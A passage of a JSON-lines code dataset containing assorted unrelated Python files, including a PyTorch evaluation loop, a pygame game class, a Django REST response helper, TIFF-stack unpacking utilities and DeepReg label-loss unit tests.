torch.cuda.synchronize()\n model_time = time.time()\n outputs = model(image)\n\n outputs = [{k: v.to(cpu_device) for k, v in t.items()} for t in outputs]\n model_time = time.time() - model_time\n\n res = {target[\"image_id\"].item(): output for target, output in zip(targets, outputs)}\n evaluator_time = time.time()\n coco_evaluator.update(res)\n evaluator_time = time.time() - evaluator_time\n metric_logger.update(model_time=model_time, evaluator_time=evaluator_time)\n\n # gather the stats from all processes\n metric_logger.synchronize_between_processes()\n print(\"Averaged stats:\", metric_logger)\n coco_evaluator.synchronize_between_processes()\n\n # accumulate predictions from all images\n coco_evaluator.accumulate()\n coco_evaluator.summarize()\n torch.set_num_threads(n_threads)\n return coco_evaluator\n","sub_path":"PyTorch/built-in/cv/classification/DenseNet169_ID0454_for_PyTorch/references/detection/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"6082196","text":"import numpy as np\n\ndef order_points(pts):\n\t# 初始化矩形4个顶点的坐标\n\trect = np.zeros((4, 2), dtype='float32')\n\t# 坐标点求和 x+y\n\ts = pts.sum(axis = 1)\n\t# np.argmin(s) 返回最小值在s中的序号\n\trect[0] = pts[np.argmin(s)]\n\trect[2] = pts[np.argmax(s)]\n\t# diff就是后一个元素减去前一个元素 y-x\n\tdiff = np.diff(pts, axis=1)\n\trect[1] = pts[np.argmin(diff)]\n\trect[3] = pts[np.argmax(diff)]\n\t# 返回矩形有序的4个坐标点\n\treturn rect","sub_path":"component/additionModule.py","file_name":"additionModule.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"378322912","text":"class VarHandler(object):\r\n var_dict = {\r\n \"numeric_vars_zero_fill\" : [\r\n # 'mortgage_-_amount_exact_',\r\n 'mortgage',\r\n 'visits',\r\n 'cjm-currentphase',\r\n \"samen_afsluiten_views\",\r\n \"zelf_afsluiten_views\",\r\n \"jouw_woonsituatie_views\",\r\n \"eerste_woning_views\",\r\n \"zelf_berekenen_views\",\r\n \"bestaande_woning_views\",\r\n \"volgende_woning_views\",\r\n 'finance_-_private_deposits',\r\n 'finance_-_loan_payments_month',\r\n 'loan_payments',\r\n \"bestaande_woning_count\",\r\n \"volgende_woning_count\",\r\n \"starter_count\"\r\n ],\r\n \"numeric_vars_mean_fill\" : [\r\n 'currentscreenwidth',\r\n 'visitclicks',\r\n 'currentscreenheight',\r\n 'clickcount',\r\n 'frequency',\r\n 'momentum',\r\n 'recency',\r\n 'intensity',\r\n 'recent_intensity',\r\n 'averagetime',\r\n 'engagement_score',\r\n 'loyalty_score',\r\n 'prospect_score',\r\n 'brand_prospect_score',\r\n # 'finance_-_annual_income',\r\n 'annual_income',\r\n 'age_partner',\r\n # 'finance_-_annual_income_partner',\r\n 'annual_income_partner',\r\n 'buy_price',\r\n 'home_-_asking_price_exact_',\r\n 'private_deposits',\r\n 'plot_area',\r\n 'surface',\r\n 'contents',\r\n 'built',\r\n 'age',\r\n \"time_to_calculator_use\",\r\n 'firstvisit',\r\n #'lastvisit',\r\n\r\n ],\r\n \"categorical_vars_median\" : [\r\n 'language',\r\n 'resolution',\r\n 'currentbrowsername',\r\n 'currentbrowserversion',\r\n 'currentosversion',\r\n 'devicetype',\r\n 'currentosname',\r\n 'browsername',\r\n 'currentresolution',\r\n 'browserversion',\r\n 'osname',\r\n 'osversion',\r\n 'devicetypes',\r\n 'testgroup',\r\n 'sent_to_connection',\r\n 'sent_to_system',\r\n 'visiteddomain',\r\n 'visitedchannel',\r\n 'privacy_legislation',\r\n 'entrypage',\r\n\r\n 'referrerhost',\r\n 'mr_geo_geoname_id',\r\n 'geo_geoname_id',\r\n 
'referrerhosts',\r\n 'mr_geo_country_name',\r\n 'mr_geo_time_zone',\r\n 'mr_geo_continent_code',\r\n 'mr_geo_continent_name',\r\n 'mr_geo_country_iso_code',\r\n # 'geo_time_zone',\r\n # 'geo_country_name',\r\n # 'geo_country_iso_code',\r\n # 'geo_continent_name',\r\n # 'geo_continent_code',\r\n 'consented_objectives',\r\n 'mr_geo_subdivision_1_iso_code',\r\n 'mr_geo_subdivision_2_iso_code',\r\n 'mr_geo_subdivision_2_name',\r\n 'mr_geo_subdivision_1_name',\r\n 'geo_city_name',\r\n 'origin_source',\r\n 'geo_subdivision_1_name',\r\n 'geo_subdivision_2_name',\r\n 'origin_type',\r\n 'geo_subdivision_1_iso_code',\r\n 'geo_subdivision_2_iso_code',\r\n 'origin_detail',\r\n 'mr_geo_latlong',\r\n 'geo_latlong',\r\n 'received_from_connection',\r\n 'received_from_system',\r\n 'engagement',\r\n 'utm_medium',\r\n 'utm_source',\r\n 'Home-verzekering',\r\n 'utm_campaign',\r\n 'utm_content',\r\n 'current_utm_source',\r\n 'current_utm_campaign',\r\n 'current_utm_medium',\r\n 'visit_time',\r\n\r\n 'current_utm_content',\r\n 'permissionlevel',\r\n 'marital_state',\r\n 'permissionlevelset',\r\n 'cookies_accepted',\r\n 'visited_url_most_recent_',\r\n 'prospect',\r\n 'mortgage_type',\r\n 'mortgage_provider',\r\n 'interested_in',\r\n 'campaigns_with_subsequent_action',\r\n 'search_state',\r\n 'bouw',\r\n 'Brand-Vestigingnummer',\r\n 'financial_obligations',\r\n 'mortgage_type_interest',\r\n 'pref_-_news_-_interesse',\r\n 'property_build_plot',\r\n 'brand_-_featured_button_click',\r\n 'property_type',\r\n 'utm_term',\r\n 'situation_-_first_mariage',\r\n 'bkr',\r\n 'current_utm_term',\r\n 'nationality',\r\n 'home_have_in_mind',\r\n 'loan_-_type_of_income',\r\n 'int_-_product',\r\n ],\r\n \"categorical_vars_none\":\r\n [\r\n 'refused_objectives',\r\n 'afford',\r\n 'appointment_reason',\r\n 'currentkeywords',\r\n \"Berekeningen\",\r\n \"visit_timestamps\",\r\n #\"soltest_-_rule_based\",\r\n 'mr_geo_city_name',\r\n 'mr_geo_zipcode'\r\n\r\n ],\r\n \"bool_datetimes\" : [\r\n \"calc_max_mortgage_allow_date\",\r\n \"cookies_accepted_date\",\r\n \"calc_monthly_costs_date\",\r\n 'search_state_date',\r\n 'calc_afford_home_date',\r\n \"AfspraakDatum\",\r\n #\"calc_visit_-_pakket_advies\",\r\n 'Brand-Vestigingnummer-date',\r\n 'calc_home_value',\r\n 'brand_-_afspraak_maken_visit_page_-_visit_date',\r\n 'bkr_date',\r\n 'calc_home_value_date',\r\n 'brand_-_featured_button_click_-_date',\r\n 'brand_-_rbs-id_-_date',\r\n 'calc_visit_-_pakket_advies',\r\n 'login_date',\r\n 'propositiekiezer_-_visit_step_1',\r\n 'home_have_in_mind_date',\r\n\r\n ],\r\n \"occurence_counts\" : [\r\n \"calculator_used\"\r\n ],\r\n \"list_vars\":\r\n [\r\n 'url-name',\r\n 'recentlyvieweditems',\r\n 'keywords',\r\n \"interactions_viewed\",\r\n 'visitedsites',\r\n 'interactions_clicked',\r\n 'interactions_converted',\r\n ]\r\n }\r\n\r\n","sub_path":"Stage_of_life/variabelen_levensfase.py","file_name":"variabelen_levensfase.py","file_ext":"py","file_size_in_byte":5715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"5737644","text":"def binary_search(arr, target, start, end):\n while start <= end:\n mid = (start + end) // 2\n if target == arr[mid]:\n return mid\n\n elif target < arr[mid]:\n end = mid - 1\n else:\n start = mid + 1\n return None\n\n\nn = int(input()) # 가계부품\nn_arr = list(map(int, input().split()))\nn_arr.sort()\n\nm = int(input()) # 찾는 부품\nm_arr = list(map(int, input().split()))\n\nfor i in m_arr:\n result = binary_search(n_arr, i, 0, n - 1)\n if result != None:\n print(\"yes\", end=\" 
\")\n else:\n print(\"no\", end=\" \")\n","sub_path":"Book/Binary_Search/Binary_Search_1.py","file_name":"Binary_Search_1.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"481012887","text":"import pygame\nfrom PyQt5.QtCore import pyqtSignal\n\nfrom model.entity.game_entities.meta_game import Game\nfrom model.entity.objects_for_game.move_object import Move_object\nfrom model.logic.camera_logic.camera_module import Camera\nfrom model.logic.player_logic.operation_under_player import OperationUnderPlayer\nfrom veiw.view_on_desctop_screen import VeiwOnDesctop\n\n\nclass SecondGame(Game):\n win_sign = pyqtSignal()\n def __init__(self):\n super(SecondGame, self).__init__()\n\n self.left = False\n self.right = False\n self.up = True\n\n def read_data_from_client(self, data):\n\n list_data = data.split(' ')\n while len(list_data) != 1:\n if list_data[0] == 'h':\n self.hero.rect.x, self.hero.rect.y = int(list_data[1]), int(list_data[2])\n list_data = list_data[3:]\n elif list_data[0] == 'b':\n pl_new = Move_object(int(list_data[1]), int(list_data[2]),self.path_to_texture)\n self.falling_down_group.add(pl_new)\n self.platforms2.append(pl_new)\n list_data = list_data[3:]\n\n def filling_and_rending_obj(self):\n\n self.screen.fill((150, 25, 210))\n Camera.rendering_on_screen_objects(self.screen,self.hero,self.hero2)\n Camera.rendering_on_screen_platforms(self.screen,self.sprite_group, self.hero2)\n Camera.rendering_on_screen_platforms(self.screen, self.falling_down_group, self.hero2)\n VeiwOnDesctop.blitting_screen_on_window(self.window,self.screen,(0,0))\n\n def hero_updating(self):\n OperationUnderPlayer.update(self.hero2, self.platforms, left=self.left, right=self.right, up=self.up)\n self.left, self.right, self.up = False, False, False\n\n def hero_colliding(self):\n\n OperationUnderPlayer.collide(self.hero2, 0, self.hero2.yvel, self.platforms)\n OperationUnderPlayer.collide(self.hero2,self.hero2.xvel, 0, self.platforms)\n OperationUnderPlayer.collide(self.hero2,0, self.hero2.yvel, self.platforms2)\n OperationUnderPlayer.collide(self.hero2,self.hero2.xvel, 0, self.platforms2)\n\n def game_loop(self):\n\n self.sign_read.emit('h ' + str(self.hero2.rect.x) + \" \" + str(self.hero2.rect.y) +\" \" )\n\n for i in pygame.event.get():\n\n if i.type == pygame.QUIT:\n self.timer.stop()\n\n ##action for first player\n\n if i.type == pygame.KEYDOWN:\n\n if pygame.key.get_pressed()[97]:\n self.left=True\n\n if pygame.key.get_pressed()[100]:\n self.right = True\n\n if pygame.key.get_pressed()[119]:\n self.win_sign.emit()\n self.up=True\n\n self.check_colliding_between_platforms()\n self.hero_colliding()\n self.hero_updating()\n self.filling_and_rending_obj()\n pygame.display.flip()\n self.timer_tick.tick(50)\n\n\n","sub_path":"model/entity/game_entities/game_for_second.py","file_name":"game_for_second.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"255981704","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 14 15:11:42 2020\n\n@author: Rohan Prateek\n\"\"\"\n\ndef addStr(str1, str2):\n \n s1 = [x for x in str1] # making list of all chars in strings\n s2 = [x for x in str2]\n \n for i in range(len(s2)): # putting all characters into single list\n s1.append(s2[i]) \n add_list = ''.join(s1) # joining all characters to get concatenated string\n \n return add_list\n \n \na = 'Rohan'\nb = 
'Prateek'\nprint(addStr(a, b))","sub_path":"string_concat.py","file_name":"string_concat.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"99989436","text":"from rest_framework.response import Response\n\n\nclass ApiResponse(Response):\n    def __init__(self, data_status=200,data_message='提示信息',result=None,http_status=None,headers=None,\n                 exception=False,**kwargs):\n        data={\n            'status':data_status,\n            'message':data_message,\n        }\n        # include the result payload only when one was provided\n        if result:\n            data['result']=result\n        # merge any extra keyword arguments into the response body\n        data.update(kwargs)\n        super().__init__(data=data,status=http_status,headers=headers,exception=exception)\n","sub_path":"drf_ems/utils/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"618861712","text":"class Solution:\n    def movesToChessboard(self, board):\n        \"\"\"\n        :type board: List[List[int]]\n        :rtype: int\n        \"\"\"\n        step1 = 0\n        step2 = 0\n        one = []\n        zero = []\n        for i in range(len(board[0])):\n            if board[0][i] == 1:\n                one.append(i)\n            else:\n                zero.append(i)\n        print(one)\n        print(zero)\n        if len(one) != len(zero):\n            return -1\n        else:\n            order1 = []\n            order2 = []\n            for i in range(len(one)):\n                order1.append(one[i])\n                order1.append(zero[i])\n                order2.append(zero[i])\n                order2.append(one[i])\n            for i in range(len(order1)):\n                if i != order1[i]:\n                    step1 += 1\n                if i != order2[i]:\n                    step2 += 1\n            # each column swap fixes two misplaced positions, so the move\n            # count for either target ordering is half the mismatch count;\n            # note this draft only inspects the first row of the board\n            return min(step1, step2) // 2\n\n\nif __name__ == '__main__':\n    s = Solution()\n    print(s.movesToChessboard([[0, 1, 1, 0], [0, 1, 1, 0], [1, 0, 0, 1], [1, 0, 0, 1]]))\n","sub_path":"0782-Transform to Chessboard.py","file_name":"0782-Transform to Chessboard.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"35168799","text":"import os, re, sys\n\nimport pandas as pd\nimport skimage\nimport skimage.io\n\nfrom mk_analysis import files\n\n# ie: 20181010_example_A1.tif\nregex_image = \"(.*)\\.tif\"\n# ie: 20181010_example_A1_0012.tif (12th image/slice in stack A1)\nregex_single = \".*\\-\\d{4}\\.tif\"\n# compile regex patterns to use\nre_image = re.compile(regex_image)\nre_single = re.compile(regex_single)\n\n#######################\n### misc. 
functions ###\n#######################\n\n# clear terminal screen based on OS\ndef clear():\n \n if sys.platform == 'win32':\n\n clear = 'cls'\n \n else:\n \n clear = 'clear'\n \n os.system(clear)\n\n# create folders for your project\ndef create_folder(image_folder,folder):\n\n os.makedirs(os.path.join(image_folder, folder), exist_ok=True)\n new_folder = os.path.join(image_folder,folder)\n\n return new_folder\n\n#######################\n### regex functions ###\n#######################\n\n# create image df from tiff stacks\ndef create_image_df(image_folder):\n \n image_files_dict = [make_dict(f, image_folder, re_image) for f in os.listdir(image_folder) if check_file(f, re_image, re_single)]\n image_df = pd.DataFrame(image_files_dict)\n \n return image_df\n\n# create single image df by checking for unpacked, single, 8-bit tiffs using RE\ndef create_single_df(image_folder):\n \n image_files_dict = [make_dict(f, image_folder, re_single) for f in os.listdir(image_folder) if is_single(f, re_single)]\n image_df = pd.DataFrame(image_files_dict)\n \n return image_df\n\n# create python dictionary storing file paths and stack names\ndef make_dict(filename, path, re_obj):\n \n my_dict = re_obj.match(filename).groupdict()\n my_dict[\"filename\"] = filename\n my_dict[\"path\"] = path\n\n return my_dict\n\n# check if tiff stack, and not single image\ndef check_file(filename, re_image, re_single):\n \n mybool = False\n \n if ( re_image.match(filename) != None \n and re_single.match(filename) == None\n ):\n \n mybool = True\n \n return mybool\n\n# check if filename is a single image\ndef is_single(filename, re_obj):\n \n mybool = False\n \n if re_obj.match(filename) != None:\n \n mybool = True\n \n return mybool\n\n##################################################\n## Unpack tiffs using Regex Functions & Skimage ## \n##################################################\n\ndef unpack(image_folder, single_folder):\n\n image_df = create_image_df(image_folder)\n\n timepoints, unpack_done = check_tiffs(image_df,image_folder,single_folder)\n\n if image_df.empty is True:\n\n sys.exit(\">>> No tiff stacks to unpack.\")\n\n elif image_df.empty is False and unpack_done is True:\n \n print(\">> Tiff stacks unpacked..\")\n \n return timepoints\n\n elif image_df.empty is False and unpack_done is False:\n \n print(\">> Unpacking tiffs..\")\n \n unpack_tiffs(image_df, single_folder, timepoints)\n\n return timepoints\n\n else:\n\n sys.exit()\n\n# Converts tiff stacks to 8-bit grayscale. 
Uses first stack from check_tiffs to check that \n# all tiff stacks are the same length\ndef unpack_tiffs(image_df,folder,ref_timepoints):\n \n for n in image_df.index:\n \n image = skimage.io.imread(os.path.join(image_df[\"path\"][n], image_df[\"filename\"][n]))\n timepoints = image.shape[0]\n\n if len(image.shape) < 4:\n \n retest = re_image.match(image_df[\"filename\"][n])\n retest.group(1)\n new_filename = \"{0}-{1:04d}.tif\".format(retest.group(1), 0)\n\n image2 = skimage.color.rgb2gray(image)\n image2 = skimage.img_as_ubyte(image2)\n skimage.io.imsave(os.path.join(image_df[\"path\"][n], new_filename), image2)\n\n # Check if timepoints for current stack matches first stack # \n elif timepoints == ref_timepoints:\n \n for i in range(timepoints):\n \n retest = re_image.match(image_df[\"filename\"][n])\n retest.group(1)\n new_filename = \"{0}-{1:04d}.tif\".format(retest.group(1), i)\n\n image2 = skimage.color.rgb2gray(image[i,:,:,:])\n image2 = skimage.img_as_ubyte(image2)\n skimage.io.imsave(os.path.join(image_df[\"path\"][n], folder, new_filename), image2)\n\n else:\n \n sys.exit(\">>> Error: The first stack is {0} frames long. {2} has {3}.\".format(ref_timepoints, image, timepoints))\n\n# num of tiff stacks x num frames in stack == num unpacked single images\ndef check_tiffs(image_dataframe, image_folder, single_folder):\n\n stack_list = files.make_image_list(image_folder,'.tif')\n single_list = files.make_image_list(single_folder,'.tif')\n\n first_stack = skimage.io.imread(os.path.join(image_dataframe[\"path\"][0], image_dataframe[\"filename\"][0]))\n timepoints = first_stack.shape[0]\n\n if len(single_list) == (len(stack_list) * timepoints):\n\n unpack_done = True\n \n else:\n \n unpack_done = False\n\n return timepoints, unpack_done\n\n################################\n### lite unpack (w/o checks) ###\n################################\n\n# Unpack tiff stacks using create_image_df & unpack_stacks #\ndef unpack_lite(image_folder,single_folder):\n\n image_df = create_image_df(image_folder)\n \n print(\">> Unpacking tiffs..\")\n \n unpack_tiffs_lite(image_df, single_folder)\n\ndef unpack_tiffs_lite(image_df,folder):\n \n for n in image_df.index:\n \n image = skimage.io.imread(os.path.join(image_df[\"path\"][n], image_df[\"filename\"][n]))\n\n if len(image.shape) < 4:\n \n retest = re_image.match(image_df[\"filename\"][n])\n retest.group(1)\n new_filename = \"{0}-{1:04d}.tif\".format(retest.group(1), 0)\n\n image2 = skimage.color.rgb2gray(image)\n image2 = skimage.img_as_ubyte(image2)\n skimage.io.imsave(os.path.join(image_df[\"path\"][n], new_filename), image2)\n\n else:\n \n timepoints = image.shape[0]\n \n for i in range(timepoints):\n\n retest = re_image.match(image_df[\"filename\"][n])\n retest.group(1)\n new_filename = \"{0}-{1:04d}.tif\".format(retest.group(1), i)\n\n image2 = skimage.color.rgb2gray(image[i,:,:,:])\n image2 = skimage.img_as_ubyte(image2)\n skimage.io.imsave(os.path.join(image_df[\"path\"][n], folder, new_filename), image2)","sub_path":"mk_analysis/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"492500885","text":"# Programmers: [Tarah Sipos, Zoe Garceau]\n# Course: CS151, Dr. 
Kenyon\n# Date: [September 13, 2018]\n# Lab Assignment: [Lab1]\n# Problem Statement: [Our program will help calculate the number of teaspoons and tablespoons from mL]\n# Data In: [The amount of mL]\n# Data Out: [the conversion to teaspoons and tablespoons]\n# Other files needed: [none]\n# Credits: [lab example]\n\nmL = float(input(\"How many mL do you have?\\n\"))\n\ntsp = mL/5\n\ntbsp = round(tsp/3, 2)\n\n# print(\"there are\", tbsp, tsp)\nprint(\"There are \" + str(tbsp) + \" tablesspoons in \" + str(mL) + \" mL.\")\n","sub_path":"lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"109370289","text":"# coding=utf-8\n\n\"\"\"\nTests for deepreg/model/loss/label.py in\npytest style\n\"\"\"\n\nfrom test.unit.util import is_equal_tf\n\nimport numpy as np\nimport pytest\nimport tensorflow as tf\n\nimport deepreg.model.loss.label as label\n\n\ndef test_gauss_kernel1d_0():\n \"\"\"\n Testing case where sigma = 0, expect 0 return\n \"\"\"\n sigma = tf.constant(0, dtype=tf.float32)\n expect = tf.constant(0, dtype=tf.float32)\n get = label.gauss_kernel1d(sigma)\n assert get == expect\n\n\ndef test_gauss_kernel1d_else():\n \"\"\"\n Testing case where sigma is not 0,\n expect a tensor returned.\n \"\"\"\n sigma = 3\n get = tf.cast(label.gauss_kernel1d(sigma), dtype=tf.float32)\n expect = [\n np.exp(-0.5 * x ** 2 / sigma ** 2) for x in range(-sigma * 3, sigma * 3 + 1)\n ]\n expect = tf.convert_to_tensor(expect, dtype=tf.float32)\n expect = expect / tf.reduce_sum(expect)\n assert is_equal_tf(get, expect)\n\n\ndef test_cauchy_kernel_0():\n \"\"\"\n Test case where sigma = 0, expect 0 return.\n \"\"\"\n sigma = tf.constant(0, dtype=tf.float32)\n expect = tf.constant(0, dtype=tf.float32)\n get = label.cauchy_kernel1d(sigma)\n assert get == expect\n\n\ndef test_cauchy_kernel_else():\n \"\"\"\n Test case where sigma is not 0, expect\n tensor returned.\n \"\"\"\n sigma = 3\n get = tf.cast(label.cauchy_kernel1d(sigma), dtype=tf.float32)\n expect = [1 / ((x / sigma) ** 2 + 1) for x in range(-sigma * 5, sigma * 5 + 1)]\n expect = tf.convert_to_tensor(expect, dtype=tf.float32)\n expect = expect / tf.reduce_sum(expect)\n assert is_equal_tf(get, expect)\n\n\ndef test_foreground_prop_binary():\n \"\"\"\n Test foreground function with a\n tensor of zeros with some ones, asserting\n equal to known precomputed tensor.\n Testing with binary case.\n \"\"\"\n array_eye = np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n expect = tf.convert_to_tensor([1.0 / 3, 1.0 / 3, 1.0 / 3], dtype=tf.float32)\n get = label.foreground_proportion(tensor_eye)\n assert is_equal_tf(get, expect)\n\n\ndef test_foreground_prop_simple():\n \"\"\"\n Test foreground functions with a tensor\n of zeros with some ones and some values below\n one to assert the thresholding works.\n \"\"\"\n array_eye = np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, 0, :, :] = 0.4 * array_eye # 0\n tensor_eye[:, 1, :, :] = array_eye\n tensor_eye[:, 2, :, :] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n expect = [54 / (27 * 9), 54 / (27 * 9), 54 / (27 * 9)]\n get = label.foreground_proportion(tensor_eye)\n assert is_equal_tf(get, expect)\n\n\ndef test_jaccard_index():\n \"\"\"\n Testing jaccard index function with computed\n tensor.\n \"\"\"\n array_eye = np.identity(3, 
dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, 0:2, :, :] = array_eye\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n\n num = np.array([6, 6, 6])\n denom = np.array([9, 9, 9]) + np.array([6, 6, 6]) - num\n\n get = num / denom\n expect = label.jaccard_index(tensor_eye, tensor_pred)\n assert is_equal_tf(get, expect)\n\n\ndef test_dice_not_binary():\n \"\"\"\n Testing dice score with binary tensor\n comparing to a precomputed value.\n \"\"\"\n array_eye = np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, 0:2, :, :] = array_eye\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n\n num = 2 * np.array([6, 6, 6])\n denom = np.array([9, 9, 9]) + np.array([6, 6, 6])\n\n get = num / denom\n expect = label.dice_score(tensor_eye, tensor_pred)\n assert is_equal_tf(get, expect)\n\n\ndef test_dice_binary():\n \"\"\"\n Testing dice score with not binary tensor\n to assert thresholding works.\n \"\"\"\n array_eye = 0.6 * np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, 0:2, :, :] = array_eye\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n\n num = 2 * np.array([6, 6, 6])\n denom = np.array([9, 9, 9]) + np.array([6, 6, 6])\n\n get = num / denom\n expect = label.dice_score(tensor_eye, tensor_pred, binary=True)\n assert is_equal_tf(get, expect)\n\n\ndef test_dice_general():\n \"\"\"\n Testing general dice function with\n non binary features and checking\n against precomputed tensor.\n \"\"\"\n array_eye = 0.6 * np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, 0:2, :, :] = array_eye\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n\n y_prod = np.sum(tensor_eye * tensor_pred, axis=(1, 2, 3))\n y_sum = np.sum(tensor_eye, axis=(1, 2, 3)) + np.sum(tensor_pred, axis=(1, 2, 3))\n\n num = 2 * y_prod\n den = y_sum\n expect = num / den\n get = label.dice_score_generalized(tensor_eye, tensor_pred)\n\n assert is_equal_tf(get, expect)\n\n\ndef test_weighted_bce():\n \"\"\"\n Checking binary cross entropy calculation\n against a precomputed tensor.\n \"\"\"\n array_eye = np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_eye = tf.constant(tensor_eye, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, 0:2, :, :] = array_eye\n tensor_pred = tf.constant(tensor_pred, dtype=tf.float32)\n\n expect = [1.7908996, 1.7908996, 1.7908996]\n get = label.weighted_binary_cross_entropy(tensor_eye, tensor_pred)\n assert is_equal_tf(get, expect)\n\n\ndef test_separable_filter_0():\n \"\"\"\n Testing separable filter with case where\n 0 length vector is passed.\n \"\"\"\n 
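# A zero-length kernel is a degenerate case; the commented-out sketch below\n    # suggests the intended behaviour is for an empty kernel to act as the\n    # identity. Until that is decided, this test is a deliberate no-op.\n    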
pass\n # kernel = np.empty((0))\n # array_eye = np.identity(3, dtype=np.float32)\n # get = label.separable_filter3d(array_eye, kernel)\n # expect = array_eye\n # assert is_equal_tf(get, expect)\n\n\ndef test_separable_filter_else():\n \"\"\"\n Testing separable filter case where non\n zero length tensor is passed to the\n function.\n \"\"\"\n k = np.ones((3, 3, 3, 3), dtype=np.float32)\n array_eye = np.identity(3, dtype=np.float32)\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, :, 0, 0] = array_eye\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n k = tf.convert_to_tensor(k, dtype=tf.float32)\n\n expect = np.ones((3, 3, 3, 3), dtype=np.float32)\n expect = tf.convert_to_tensor(expect, dtype=tf.float32)\n\n get = label.separable_filter3d(tensor_pred, k)\n assert is_equal_tf(get, expect)\n\n\ndef test_compute_centroid():\n \"\"\"\n Testing compute centroid function\n and comparing to expected values.\n \"\"\"\n tensor_mask = np.zeros((3, 2, 2, 2))\n tensor_mask[0, :, :, :] = np.ones((2, 2, 2))\n tensor_mask = tf.constant(tensor_mask, dtype=tf.float32)\n\n tensor_grid = np.ones((2, 2, 2, 3))\n tensor_grid[:, :, :, 1] *= 2\n tensor_grid[:, :, :, 2] *= 3\n tensor_grid = tf.constant(tensor_grid, dtype=tf.float32)\n\n expected = np.ones((3, 3)) # use 1 because 0/0 ~= (0+eps)/(0+eps) = 1\n expected[0, :] = [1, 2, 3]\n got = label.compute_centroid(tensor_mask, tensor_grid)\n assert is_equal_tf(got, expected)\n\n\ndef test_compute_centroid_d():\n \"\"\"\n Testing compute centroid distance between equal\n tensors returns 0s.\n \"\"\"\n array_ones = np.ones((2, 2))\n tensor_mask = np.zeros((3, 2, 2, 2))\n tensor_mask[0, :, :, :] = array_ones\n tensor_mask = tf.convert_to_tensor(tensor_mask, dtype=tf.float32)\n\n tensor_grid = np.zeros((2, 2, 2, 3))\n tensor_grid[:, :, :, 0] = array_ones\n tensor_grid = tf.convert_to_tensor(tensor_grid, dtype=tf.float32)\n\n get = label.compute_centroid_distance(tensor_mask, tensor_mask, tensor_grid)\n expect = np.zeros((3))\n assert is_equal_tf(get, expect)\n\n\ndef test_squared_error():\n \"\"\"\n Testing squared error function by comparing\n to precomputed tensor.\n \"\"\"\n tensor_mask = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_mask[0, 0, 0, 0] = 1\n tensor_mask = tf.convert_to_tensor(tensor_mask, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, :, :, :] = 1\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n\n expect = np.array([26 / 27, 1.0, 1.0])\n get = label.squared_error(tensor_mask, tensor_pred)\n assert is_equal_tf(get, expect)\n\n\ndef test_single_scale_loss_dice():\n \"\"\"\n Testing single sclare loss returns\n precomputed, known dice loss for given\n inputs.\n \"\"\"\n array_eye = np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 